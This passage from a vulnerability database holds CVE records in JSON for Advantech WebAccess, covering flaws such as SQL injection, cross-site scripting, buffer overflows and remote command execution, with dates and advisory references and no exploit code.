"providerMetadata": { "dateUpdated": "2018-10-22T18:57:01", "orgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "shortName": "tenable" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2018-33" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "vulnreport@tenable.com", "DATE_PUBLIC": "2018-10-18T00:00:00", "ID": "CVE-2018-15703", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "8.3.2 and below" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess 8.3.2 and below is vulnerable to multiple reflected cross site scripting vulnerabilities. A remote unauthenticated attacker could potentially exploit this vulnerability by tricking a victim to supply malicious HTML or JavaScript code to WebAccess, which is then reflected back to the victim and executed by the web browser." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Reflected Cross Site Scripting" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.tenable.com/security/research/tra-2018-33", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2018-33" } ] } } } }, "cveMetadata": { "assignerOrgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "assignerShortName": "tenable", "cveId": "CVE-2018-15703", "datePublished": "2018-10-22T19:00:00Z", "dateReserved": "2018-08-22T00:00:00", "dateUpdated": "2024-09-16T19:57:33.496Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-0858
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.zerodayinitiative.com/advisories/ZDI-16-105 | x_refsource_MISC | |
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T22:30:05.044Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-105" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Race condition in Advantech WebAccess before 8.1 allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow) via a crafted request." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-12-01T15:57:02", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-105" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2016-0858", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Race condition in Advantech WebAccess before 8.1 allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow) via a crafted request." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-105", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-105" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2016-0858", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-12-17T00:00:00", "dateUpdated": "2024-08-05T22:30:05.044Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-16728
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/102424 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T20:35:20.278Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "102424", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/102424" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2018-01-05T00:00:00", "descriptions": [ { "lang": "en", "value": "An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-822", "description": "CWE-822", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-01-06T10:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "102424", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/102424" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-16728", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-822" } ] } ] }, "references": { "reference_data": [ { "name": "102424", "refsource": "BID", "url": "http://www.securityfocus.com/bid/102424" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-16728", "datePublished": "2018-01-05T08:00:00", "dateReserved": "2017-11-09T00:00:00", "dateUpdated": "2024-08-05T20:35:20.278Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2014-8388
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-14-324-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T13:18:48.124Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-324-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2014-11-20T00:00:00", "descriptions": [ { "lang": "en", "value": "Stack-based buffer overflow in Advantech WebAccess, formerly BroadWin WebAccess, before 8.0 allows remote attackers to execute arbitrary code via a crafted ip_address parameter in an HTML document." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2014-11-21T02:57:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-324-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2014-8388", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Stack-based buffer overflow in Advantech WebAccess, formerly BroadWin WebAccess, before 8.0 allows remote attackers to execute arbitrary code via a crafted ip_address parameter in an HTML document." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-14-324-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-324-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2014-8388", "datePublished": "2014-11-21T02:00:00", "dateReserved": "2014-10-22T00:00:00", "dateUpdated": "2024-08-06T13:18:48.124Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2015-6467
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T07:22:21.630Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess before 8.1 allows remote attackers to execute arbitrary code via vectors involving a browser plugin." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-01-15T02:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2015-6467", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess before 8.1 allows remote attackers to execute arbitrary code via vectors involving a browser plugin." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2015-6467", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-08-17T00:00:00", "dateUpdated": "2024-08-06T07:22:21.630Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-16716
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/102424 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02 | x_refsource_MISC | |
https://www.exploit-db.com/exploits/43928/ | exploit, x_refsource_EXPLOIT-DB |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T20:35:20.466Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "102424", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/102424" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" }, { "name": "43928", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/43928/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2018-01-05T00:00:00", "descriptions": [ { "lang": "en", "value": "A SQL Injection issue was discovered in WebAccess versions prior to 8.3. WebAccess does not properly sanitize its inputs for SQL commands." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-89", "description": "CWE-89", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-02-01T10:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "102424", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/102424" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" }, { "name": "43928", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/43928/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-16716", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A SQL Injection issue was discovered in WebAccess versions prior to 8.3. WebAccess does not properly sanitize its inputs for SQL commands." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-89" } ] } ] }, "references": { "reference_data": [ { "name": "102424", "refsource": "BID", "url": "http://www.securityfocus.com/bid/102424" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" }, { "name": "43928", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/43928/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-16716", "datePublished": "2018-01-05T08:00:00", "dateReserved": "2017-11-09T00:00:00", "dateUpdated": "2024-08-05T20:35:20.466Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-6911
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.exploit-db.com/exploits/44031/ | exploit, x_refsource_EXPLOIT-DB |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T06:17:17.130Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "44031", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/44031/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2018-02-13T00:00:00", "descriptions": [ { "lang": "en", "value": "The VBWinExec function in Node\\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument (aka the command parameter)." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-02-13T14:57:02", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "44031", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/44031/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2018-6911", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The VBWinExec function in Node\\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument (aka the command parameter)." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "44031", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/44031/" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2018-6911", "datePublished": "2018-02-13T14:00:00", "dateReserved": "2018-02-11T00:00:00", "dateUpdated": "2024-08-05T06:17:17.130Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-12710
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.tenable.com/security/research/tra-2017-29 | x_refsource_MISC | |
https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02 | x_refsource_MISC | |
http://www.securityfocus.com/bid/100526 | vdb-entry, x_refsource_BID | |
http://www.zerodayinitiative.com/advisories/ZDI-17-712/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T18:43:56.619Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2017-29" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/100526" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-17-712/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2017-08-30T00:00:00", "descriptions": [ { "lang": "en", "value": "A SQL Injection issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. By submitting a specially crafted parameter, it is possible to inject arbitrary SQL statements that could allow an attacker to obtain sensitive information." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-89", "description": "CWE-89", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2017-11-09T18:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2017-29" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/100526" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-17-712/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-12710", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A SQL Injection issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. By submitting a specially crafted parameter, it is possible to inject arbitrary SQL statements that could allow an attacker to obtain sensitive information." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-89" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.tenable.com/security/research/tra-2017-29", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2017-29" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "refsource": "BID", "url": "http://www.securityfocus.com/bid/100526" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-17-712/", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-17-712/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-12710", "datePublished": "2017-08-30T18:00:00", "dateReserved": "2017-08-09T00:00:00", "dateUpdated": "2024-08-05T18:43:56.619Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-12014
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-20-128-01 | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-613/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess Node |
Version: WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:48:57.629Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-613/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess Node", "vendor": "n/a", "versions": [ { "status": "affected", "version": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } ], "descriptions": [ { "lang": "en", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Input is not properly sanitized and may allow an attacker to inject SQL commands." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-89", "description": "IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND (\u0027SQL INJECTION\u0027) CWE-89", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2020-05-08T20:06:25", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-613/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-12014", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess Node", "version": { "version_data": [ { "version_value": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Input is not properly sanitized and may allow an attacker to inject SQL commands." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND (\u0027SQL INJECTION\u0027) CWE-89" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-613/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-613/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2020-12014", "datePublished": "2020-05-08T11:46:31", "dateReserved": "2020-04-21T00:00:00", "dateUpdated": "2024-08-04T11:48:57.629Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-12719
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/101685 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T18:43:56.468Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "101685", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/101685" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2017-11-06T00:00:00", "descriptions": [ { "lang": "en", "value": "An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. A remote attacker is able to execute code to dereference a pointer within the program causing the application to become unavailable." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-822", "description": "CWE-822", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2017-11-08T10:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "101685", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/101685" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-12719", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. A remote attacker is able to execute code to dereference a pointer within the program causing the application to become unavailable." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-822" } ] } ] }, "references": { "reference_data": [ { "name": "101685", "refsource": "BID", "url": "http://www.securityfocus.com/bid/101685" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-12719", "datePublished": "2017-11-06T22:00:00", "dateReserved": "2017-08-09T00:00:00", "dateUpdated": "2024-08-05T18:43:56.468Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-13556
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-19-260-01 | x_refsource_MISC |
